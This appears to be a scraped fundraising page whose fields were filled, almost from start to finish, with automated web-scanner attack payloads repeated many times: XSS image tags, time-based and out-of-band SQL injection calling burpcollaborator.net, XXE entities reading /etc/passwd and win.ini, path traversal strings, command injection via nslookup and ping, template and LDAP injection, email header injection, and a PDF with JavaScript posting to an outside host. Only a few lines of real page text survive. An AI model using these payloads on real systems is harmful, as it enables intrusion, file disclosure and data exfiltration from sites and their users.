XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

markup injection

<img src=# onerror=alert(2)/>

XSSTEST

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % jwwst SYSTEM "http://o9yrso5gdbzm00qslq65tmxfs6y0mshgk4jrhf6.burpcollab'||'orator.net/">%jwwst;]>'),'/l') from dual)

XSSTEST

XSSTEST'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % jwwst SYSTEM "http://7nva67jzrud5ej4bz9ko75by6pcj0bvzznyawyl.burpcollab'||'orator.net/">%jwwst;]>'),'/l') from dual)||'

XSSTEST

XSSTEST;declare @q varchar(99);set @q='\qhbt0qdild7o82yutse71o5h0862uupig847r5fu.burpcollab'+'orator.netkiv'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST';declare @q varchar(99);set @q='\u50xou1m9hvsw6myhw2bpstlocu6iydm4dscfa3z.burpcollab'+'orator.netqpy'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST);declare @q varchar(99);set @q='\cfvfycb4jz5a6owgrectza33yu4osgn4ew2vptdi.burpcollab'+'orator.netqru'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST');declare @q varchar(99);set @q='\eashte66e10c1qrimg7vucy5twzqnii69zxykw8l.burpcollab'+'orator.netblc'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1);declare @q varchar(99);set @q='\4ot774kwsre2fg5806ll82cv7mdg18wwnqbpynmc.burpcollab'+'orator.nethfv'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2);declare @q varchar(99);set @q='\o6vrpo2gabwmx0nsiq35qmufp6v0jseg5ctbg94y.burpcollab'+'orator.netgfh'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2, 3);declare @q varchar(99);set @q='\jremajnbv6hhiv8n3lo0bhfaa1gv4nzbq9e816pv.burpcollab'+'orator.netylq'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST));declare @q varchar(99);set @q='\a8jdra42cxy8zmpekc5rs8w1rsxmleg272v1iz6o.burpcollab'+'orator.netspf'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1');declare @q varchar(99);set @q='\a0bdjaw24xq8rmheccxrk8o1jspmde82zxnwauyj.burpcollab'+'orator.netwha'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2');declare @q varchar(99);set @q='\b9lesb53dyz90nqfld6st9x2stynmfh380wzjx7m.burpcollab'+'orator.netswn'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2', '3');declare @q varchar(99);set @q='\an1d6aj2rxd8em4ezckr78b16scm0ev2m1a0xyln.burpcollab'+'orator.netvzj'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST'));declare @q varchar(99);set @q='\vxwygvtn1into7ez9xuchtlmgdm7az5nwokn7lva.burpcollab'+'orator.netazh'; exec master.dbo.xp_dirtree @q;--

XSSTEST

(select load_file('\\fh0i0fd7l27d8ryjthew1d560x6rujp7g948r6fv.burpcollaborator.net\idj'))

XSSTEST

XSSTEST'+(select load_file('\\i0jljiwa45qgruhmckxzkgo9j0pudm8azdncaayz.burpcollaborator.net\fdq'))+'

XSSTEST

XSSTEST into outfile '\\4467n40w8ru2vgl8g61lo2svnmtgh8cw30rzex2m.burpcollaborator.net\dqs'; --

XSSTEST

XSSTEST' into outfile '\\jobm7jkbs6ehfv5n0ll08hca71dv1nwbngbfydm2.burpcollaborator.net\ugo'; --

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST1=

XSSTEST

XSSTEST'(select*from(select(sleep(20)))a)'

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)+'

XSSTEST

XSSTEST' and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST,(select*from(select(sleep(20)))a)

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST')and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST'))and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST' waitfor delay'0:0:20'--

XSSTEST

XSSTEST')waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST59136398' or '6984'='6984

XSSTEST

XSSTEST90210192' or '8554'='8563

XSSTEST

XSSTEST28981005' or 3591=3591--

XSSTEST

XSSTEST97297218' or 1873=1874--

XSSTEST

XSSTEST' and '9811'='9811

XSSTEST

XSSTEST' and '4445'='4446

XSSTEST

XSSTEST' and 5644=5644--

XSSTEST

XSSTEST' and 1267=1272--

XSSTEST

(select abs(1))

XSSTEST

(select sba(1))

XSSTEST

XSSTEST"

XSSTEST

tflx61uvlc

XSSTEST

XSSTESTj5i610chdm

XSSTEST

w3mdf${765*697}a053i

XSSTEST

bcr6j{{661*424}}h2egi

XSSTEST

qyvxl{{585|add:846}}hcags

XSSTEST

#set ($a=918*961) qq750${a}nzv25

XSSTEST

ena8t<%= 258*687 %>r5c18

XSSTEST

e8ili = 763*162

XSSTEST

n05v3{{.}}tuwun{{..}}gq89q

XSSTEST

XSSTEST}}rf3xr'/"<y1qyw

XSSTEST

XSSTEST%}rlnnc'/"<hk4pn

XSSTEST

XSSTESTjwlqd%>i3qdk'/"<l376f

XSSTEST

XSSTEST%]raqg1'/"<d4cbt

XSSTEST

XSSTESTixcl7;//';//";//%>?>hyi1n'/"<ond74

XSSTEST

XSSTEST'+sleep(20.to_i)+'

XSSTEST

XSSTEST"+sleep(20.to_i)+"

XSSTEST

XSSTEST'+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+'

XSSTEST

XSSTEST"+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+"

XSSTEST

eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))

XSSTEST

XSSTEST'.sleep(20).'

XSSTEST

XSSTEST".sleep(20)."

XSSTEST

XSSTEST{${sleep(20)}}

XSSTEST

sleep(20)

XSSTEST

r5xuor1j9evpw3mvht28pptio9u3ivdj574u2ir.burpcollaborator.net

XSSTEST

http://ep7h8el6t1fcgq6i1gmv9cd58weq2ix6numhk59.burpcollaborator.net/?XSSTEST

XSSTEST

Http://5x38g5tx1sn3ohe997umh3lwgnmha95xyzmy9wxl.burpcollaborator.net/?XSSTEST

XSSTEST

https://gyijhgu823oepsfkaivxiem7hynsbk68xwwju7j.burpcollaborator.net/?XSSTEST

XSSTEST

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">[removed](new(Image)).src='//c3gfmcz47ztauokgfe0tnar3musoggb430rzex2m56burpcollaborator.net'[removed]</svg>

XSSTEST

%PDF-1.3 1 0 obj <> endobj 2 0 obj <> endobj 3 0 obj <> stream 1 0 0 -1 0 792 cm q 1 0 0 -1 0 792 cm BT 220 400 Td /F1 10 Tf (For further information please click here) Tj ET endstream endobj 4 0 obj <>>> e

XSSTEST

nslookup -q=cname 1214l1yt6osztdj5e3zimzqsljrdf5at3wrvet2i.burpcollaborator.net.&

XSSTEST

XSSTEST|nslookup -q=cname uigx1uemmh8s96zyuwfb2s6l1c76vyqmmalxjl8.burpcollaborator.net.&

XSSTEST

XSSTEST'"`0&nslookup -q=cname jsfmbjobw6ihjv9n4lp0chgab1hv5n0bxzwmuaj.burpcollaborator.net.&`'

XSSTEST

XSSTEST&nslookup -q=cname cl1f4ch4pzbaco2gxeit5a934uaoygt4osnfl3a.burpcollaborator.net.&'"`0&nslookup -q=cname cl1f4ch4pzbaco2gxeit5a934uaoygt4osnfl3a.burpcollaborator.net.&`'

XSSTEST

XSSTEST|echo 6byck5bltv vqjpdrgm4i||a #' |echo 6byck5bltv vqjpdrgm4i||a #|" |echo 6byck5bltv vqjpdrgm4i||a #

XSSTEST

XSSTEST&echo xydilhatfv z6m6joxe9z&

XSSTEST

XSSTEST"|echo 2j8slxg1kc ndmyra6dxd ||

XSSTEST

XSSTEST'|echo bedopteme8 l3vs2aux9y #xzwx

XSSTEST

XSSTEST;echo si6si7zfxz zkbh2g239p;

XSSTEST

XSSTEST echo hknwtdwlip n6oqx2ajom

XSSTEST

XSSTEST|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1

XSSTEST

XSSTEST|ping -c 21 127.0.0.1||x

XSSTEST

XSSTEST&ping -n 21 127.0.0.1&

XSSTEST

XSSTEST'|ping -c 21 127.0.0.1 #

XSSTEST

XSSTEST"|ping -n 21 127.0.0.1 ||

XSSTEST

XSSTEST&ping -c 21 127.0.0.1&

XSSTEST

XSSTEST ping -c 21 127.0.0.1

XSSTEST

XSSTEST$(ping -c 21 127.0.0.1)

XSSTEST

................................windowswin.ini

XSSTEST

c:windowswin.ini

XSSTEST

../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

................................winntwin.ini

XSSTEST

../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

windowswin.ini

XSSTEST

file:///c:/windows/win.ini

XSSTEST

........................................windowswin.ini

XSSTEST

.../..../..../..../..../..../..../..../..../..../.windows/win.ini

XSSTEST

..../..../..../..../..../..../..../..../..../..../windows/win.ini

XSSTEST

windowswin.ini

XSSTEST

....................windowswin.ini

XSSTEST

XSSTEST................................windowswin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

XSSTEST................................winntwin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

................................windowswin.iniXSSTEST

XSSTEST

c:windowswin.iniXSSTEST

XSSTEST

................................winntwin.iniXSSTEST

XSSTEST

../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

/etc/passwd

XSSTEST

file:///etc/passwd

XSSTEST

..././..././..././..././..././..././..././..././..././..././etc/passwd

XSSTEST

etcpasswd

XSSTEST

../../../../../../../../../../etc/passwd

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

../../../../../../../../../../../../../../../../etc/passwdXSSTEST

XSSTEST

.../XSSTEST

XSSTEST

/./

XSSTEST

b8zrgnr9fx)(objectClass=*

XSSTEST

9amdovgkud)(!(objectClass=*)

XSSTEST

)(objectClass=

XSSTEST

)(!(objectClass=)

XSSTEST

kzb

XSSTEST

XSSTEST]]>><

XSSTEST

<!DOCTYPE root PUBLIC "-//B/A/EN" "http://irdlainav5hgiu8m3kozbgf9a0gu4mzaxywlu9j.burpcollaborator.net">XSSTESTin4a5

XSSTEST

<!DOCTYPE [<!ENTITY % wclnp SYSTEM "http://kqen9kmcu7gihw7o2mn1aieb92fw3oycx0wnubj.burpcollaborator.net">%wclnp; ]>XSSTEST

XSSTEST

bow

XSSTEST

<?xml-stylesheet type="text/xml" href="http://devgxda5i04b5pvhqfbuyb24xv3prhm5otngl4a.burpcollaborator.net"?>XSSTEST

XSSTEST

<!DOCTYPE foo [<!ENTITY xxe6gtkv SYSTEM "http://h2kklhy964sfttjlejzymfq8lzrtfla94x3k18q.burpcollaborator.net"> ]>XSSTEST&xxe6gtkv;

XSSTEST

<!DOCTYPE foo [<!ENTITY xxeb7zbl SYSTEM "file:///c:/windows/win.ini"> ]>XSSTEST&xxeb7zbl;

XSSTEST

<!DOCTYPE foo [<!ENTITY xxe6kh7a SYSTEM "file:///etc/passwd"> ]>XSSTEST&xxe6kh7a;

XSSTEST

<!DOCTYPE foo [<!ENTITY xee3aojh0 "28gbb"><!ENTITY xee3aojh1 "&xee3aojh0;&xee3aojh0;"><!ENTITY xee3aojh2 "&xee3aojh1;&xee3aojh1;">]>XSSTEST&xee3aojh2;

XSSTEST

XSSTEST"+(function(){if(typeof zywhl==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);zywhl=1;}}())+"

XSSTEST

XSSTEST'+(function(){if(typeof np3t1==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);np3t1=1;}}())+'

XSSTEST

"-->'-->`--><!--#exec cmd="nslookup -q=cname v51yov1n9ivtw7mzhx2cpttmodu7izdn5ltkgi47.burpcolla

XSSTEST

XSSTEST BCC:user@p6wspp2hacwnx1ntir36qnugp7v1jteh6au9h75w.burpcollaborator.net osc: w

XSSTEST

XSSTEST> BCC:user@fp8i8fl7t2fdgr6j1hmw9dd68xer2jx7p1d00yon.burpcollaborator.net hzl: h

XSSTEST

user@kqen9kmcu7gihw7o2mn1aieb92fw3oycq7e614pt.burpcollaborator.net

XSSTEST

cb6i8yr5nz

XSSTEST

(select extractvalue(xmltype('%ifyng;]>'),'/l') from dual)

XSSTEST

XSSTEST'||(select extractvalue(xmltype('%ifyng;]>'),'/l') from dual)||'

XSSTEST

XSSTEST;declare @q varchar(99);set @q='\z442nz0r8muxvbl3g11goxsqnhtbh3cr3hrgeg25.burpcollab'+'orator.netgvt'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST';declare @q varchar(99);set @q='\9eocx9a1iw475lvdqbbqy720xr3lrdm1ds1rorcg.burpcollab'+'orator.netybj'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST);declare @q varchar(99);set @q='\s81vrs4kcfyqz4pwku59sqwjrax4lwgk7cvbib60.burpcollab'+'orator.netqyv'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST');declare @q varchar(99);set @q='\0uv3d0qsynkylcb462rheyirdijc742stlhk4ks9.burpcollab'+'orator.netzdp'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1);declare @q varchar(99);set @q='\cm2f5ci4qzcado3gyejt6aa35ubozgu4ly9xwxkm.burpcollab'+'orator.nettfg'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2);declare @q varchar(99);set @q='\f9pisf57d2zd0rqjlh6wtdx6sxyrmjh783w2j27r.burpcollab'+'orator.netxvj'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST, 1, 2, 3);declare @q varchar(99);set @q='\j6qmpj2ba6whxvnnil30qhuap1vvjneb59t8g84x.burpcollab'+'orator.netmyq'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST));declare @q varchar(99);set @q='\ssovbsokwfiqj49w4up9cqgjbah45w0krkfj2jq8.burpcollab'+'orator.nettui'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1');declare @q varchar(99);set @q='\4357m4zw7rt2ugk8f60ln2rvmmsgg8bw2rqqdq1f.burpcollab'+'orator.nettjw'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2');declare @q varchar(99);set @q='\4pu784lwtrf2gg6816ml92dv8meg28xwotcszsnh.burpcollab'+'orator.netzpr'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST', '1', '2', '3');declare @q varchar(99);set @q='\cfvfycb4jz5a6owgrectza33yu4osgn4e322p2dr.burpcollab'+'orator.netiue'; exec master.dbo.xp_dirtree @q;--

XSSTEST

XSSTEST'));declare @q varchar(99);set @q='\2tw5c2puxpj0kea654qjd0htckie661usvgu3urj.burpcollab'+'orator.netpbx'; exec master.dbo.xp_dirtree @q;--

XSSTEST

(select load_file('\\l8uorl4dc8yjzxppkn52sjwcr3xxlpgd7fveie63.burpcollaborator.net\ltt'))

XSSTEST

XSSTEST'+(select load_file('\\v2yylvyn6istt7jzexzcmtqmldr7fzan1qppcp0e.burpcollaborator.net\ujk'))+'

XSSTEST

XSSTEST into outfile '\\cs8fbco4wziajo9g4eptcag3buho5g04r8f727qw.burpcollaborator.net\fxf'; --

XSSTEST

XSSTEST' into outfile '\\o6vrpo2gabwmx0nsiq35qmufp6v0jseg5ltkgk49.burpcollaborator.net\hvt'; --

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST%27

XSSTEST

XSSTEST%5c%27

XSSTEST

XSSTEST'

XSSTEST

XSSTEST'

XSSTEST

XSSTEST1=

XSSTEST

XSSTEST'(select*from(select(sleep(20)))a)'

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)+'

XSSTEST

XSSTEST' and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST,(select*from(select(sleep(20)))a)

XSSTEST

XSSTEST'+(select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST')and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST'))and (select*from(select(sleep(20)))a)--

XSSTEST

XSSTEST' waitfor delay'0:0:20'--

XSSTEST

XSSTEST')waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST',0,0,0)waitfor delay'0:0:20'--

XSSTEST

XSSTEST21287096' or '5779'='5779

XSSTEST

XSSTEST65985776' or '3552'='3553

XSSTEST

XSSTEST65749941' or 5024=5024--

XSSTEST

XSSTEST26664183' or 6593=6596--

XSSTEST

XSSTEST' and '8922'='8922

XSSTEST

XSSTEST' and '1259'='1264

XSSTEST

XSSTEST' and 4781=4781--

XSSTEST

XSSTEST' and 6029=6031--

XSSTEST

(select abs(1))

XSSTEST

(select sba(1))

XSSTEST

XSSTEST"

XSSTEST

m2xjr1fl70

XSSTEST

XSSTESTzn17yabdgb

XSSTEST

qcxzs${104*192}exjtd

XSSTEST

uihye{{314*517}}bsgyr

XSSTEST

xr2yd{{787|add:515}}qh5nl

XSSTEST

#set ($a=605*994) ld1a6${a}mwlw5

XSSTEST

deosd<%= 941*122 %>q2kig

XSSTEST

bgecm = 801*227

XSSTEST

nop6b{{.}}x3w9q{{..}}zpwts

XSSTEST

XSSTEST}}xo5g1'/"

XSSTEST

XSSTEST%}c8ys8'/"

XSSTEST

XSSTESTo2i04%>lvh57'/"

XSSTEST

XSSTEST%]kuewt'/"

XSSTEST

XSSTESTvf9s3;//';//";//%>?>b318g'/"

XSSTEST

XSSTEST'+sleep(20.to_i)+'

XSSTEST

XSSTEST"+sleep(20.to_i)+"

XSSTEST

XSSTEST'+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+'

XSSTEST

XSSTEST"+eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))+"

XSSTEST

eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))

XSSTEST

XSSTEST'.sleep(20).'

XSSTEST

XSSTEST".sleep(20)."

XSSTEST

XSSTEST{${sleep(20)}}

XSSTEST

sleep(20)

XSSTEST

1y04h1ut2oozpdf5a3viizmshjndb56tyhx4xsm.burpcollaborator.net

XSSTEST

http://hn8k6hj9r4dfet4lzjky7fb86zct0lv9lxkkk89.burpcollaborator.net/?XSSTEST

XSSTEST

Http://e2hhley661sctqjiegzvmcq5lwrqfia638r7e72w.burpcollaborator.net/?XSSTEST

XSSTEST

https://uywxhuum2hosp6fyawvbismlhcn6by6mxawxwll.burpcollaborator.net/?XSSTEST

XSSTEST

xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">>(new(Image)).src='//v95ysv5ndizt07qzlx6cttxmsdy7mzhn9jxiki8756burpcollaborator.net'>>

XSSTEST

%PDF-1.3 1 0 obj <> endobj 2 0 obj <> endobj 3 0 obj <> stream 1 0 0 -1 0 792 cm q 1 0 0 -1 0 792 cm BT 220 400 Td /F1 10 Tf (For further information please click here) Tj ET endstream endobj 4 0 obj <>>> endobj 5 0 obj <> endobj 6 0 obj <> endobj 7 0 obj <> endobj 8 0 obj <> endobj 9 0 obj << /S/JavaScript/JS( if(this.submitForm){ this.submitForm('http://bapetb63ey091nrfmd7su9y2ttznnfi3a0yzlz9o.burpcollaborator.net'); app.alert("Script executed"); } ) /Next<>/S/SubmitForm>> >> endobj 10 0 obj (http://utrxcupmxhjsk6ay5wqbdshlcci66y1mumil5lta.burpcollaborator.net) endobj xref 0 11 0000000000 65536 f 0000000010 00000 n 0000000062 00000 n 0000000125 00000 n 0000000286 00000 n 0000000365 00000 n 0000000476 00000 n 0000000565 00000 n 0000000603 00000 n 0000000688 00000 n 0000000929 00000 n trailer <> startxref 1017 %%EOF

XSSTEST

nslookup -q=cname 4z47i4vw3rp2qgg8b6wlj2nvimogc87w0zoybyzn.burpcollaborator.net.&

XSSTEST

XSSTEST|nslookup -q=cname gk4j3gg8o3aebs1kwihx4e873y9sxks8ownjn7c.burpcollaborator.net.&

XSSTEST

XSSTEST'"`0&nslookup -q=cname aesdxaa2ix485mveqcbry821xs3mrem2jqidi17.burpcollaborator.net.&`'

XSSTEST

XSSTEST&nslookup -q=cname wuuzdwqoyjkul8b06yrdeuindej8702oxcwzwnl.burpcollaborator.net.&'"`0&nslookup -q=cname wuuzdwqoyjkul8b06yrdeuindej8702oxcwzwnl.burpcollaborator.net.&`'

XSSTEST

XSSTEST|echo 1u7nnwlw6t rdwh3e5g6t||a #' |echo 1u7nnwlw6t rdwh3e5g6t||a #|" |echo 1u7nnwlw6t rdwh3e5g6t||a #

XSSTEST

XSSTEST&echo ej7fn671x7 k3u0iouhaa&

XSSTEST

XSSTEST"|echo bbvhu0ryvz pnslgu84mf ||

XSSTEST

XSSTEST'|echo ohx2ylvk6u y1wyvsjg2a #xzwx

XSSTEST

XSSTEST;echo n5tocp3xdd o4uhpv0i5p;

XSSTEST

XSSTEST echo 3hdhf7qgl1 7wyxihyhzd

XSSTEST

XSSTEST|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" |ping -n 21 127.0.0.1

XSSTEST

XSSTEST|ping -c 21 127.0.0.1||x

XSSTEST

XSSTEST&ping -n 21 127.0.0.1&

XSSTEST

XSSTEST'|ping -c 21 127.0.0.1 #

XSSTEST

XSSTEST"|ping -n 21 127.0.0.1 ||

XSSTEST

XSSTEST&ping -c 21 127.0.0.1&

XSSTEST

XSSTEST ping -c 21 127.0.0.1

XSSTEST

XSSTEST$(ping -c 21 127.0.0.1)

XSSTEST

................................windowswin.ini

XSSTEST

c:windowswin.ini

XSSTEST

../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

................................winntwin.ini

XSSTEST

../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

windowswin.ini

XSSTEST

file:///c:/windows/win.ini

XSSTEST

........................................windowswin.ini

XSSTEST

.../..../..../..../..../..../..../..../..../..../.windows/win.ini

XSSTEST

..../..../..../..../..../..../..../..../..../..../windows/win.ini

XSSTEST

windowswin.ini

XSSTEST

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini

XSSTEST

XSSTEST................................windowswin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../windows/win.ini

XSSTEST

XSSTEST................................winntwin.ini

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../winnt/win.ini

XSSTEST

................................windowswin.iniXSSTEST

XSSTEST

c:windowswin.iniXSSTEST

XSSTEST

................................winntwin.iniXSSTEST

XSSTEST

../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

/etc/passwd

XSSTEST

file:///etc/passwd

XSSTEST

..././..././..././..././..././..././..././..././..././..././etc/passwd

XSSTEST

etcpasswd

XSSTEST

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

XSSTEST

XSSTEST../../../../../../../../../../../../../../../../etc/passwd

XSSTEST

../../../../../../../../../../../../../../../../etc/passwdXSSTEST

XSSTEST

.../XSSTEST

XSSTEST

/./

XSSTEST

c9fxdf9sh9)(objectClass=*

XSSTEST

pis8wi98wb)(!(objectClass=*)

XSSTEST

*)(objectClass=*

XSSTEST

*)(!(objectClass=*)

XSSTEST

yzf

XSSTEST

XSSTEST]]>><

XSSTEST

XSSTESTxcdc7

XSSTEST

%ln4s5; ]>XSSTEST

XSSTEST

apc

XSSTEST

]>XSSTEST&xxeafizy;

XSSTEST

]>XSSTEST&xxerdc3p;

XSSTEST

]>XSSTEST&xxekxnt8;

XSSTEST

]>XSSTEST&xeebjkrp2;

XSSTEST

XSSTEST"+(function(){if(typeof x8gdr==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);x8gdr=1;}}())+"

XSSTEST

XSSTEST'+(function(){if(typeof ld40s==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);ld40s=1;}}())+'

XSSTEST

"-->'-->`-->

XSSTEST

XSSTEST BCC:user@2x05g2tu1pn0oee694ujh0ltgkmea65uxnlm8mwb.burpcollaborator.net gjy: y

XSSTEST

XSSTEST> BCC:user@qtntcqpixdjok2au5sq7dohhc8i26u1itchb4bs0.burpcollaborator.net wpi: u

XSSTEST

user@fsbibfo7w2idjr9j4hpwcdg6bxhr5j07s2g131rq.burpcollaborator.net

XSSTEST

6f51m0iist

XSSTEST

test

csrf successful

Please support my fundraising!

Raised

$0 $3.08 AUD

My Goal

$nan $1,000 AUD

Select amount to donate

Would you like to make this a recurring donation?

My Activity Tracking

My target 500 mi

My Achievements

My Updates

XSSTEST

XSSTEST

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

markup injection

XSSTEST

XSSTEST

XSSTEST

XSSTEST

XSSTEST

XSSTEST

XSSTEST

XSSTEST

XSSTEST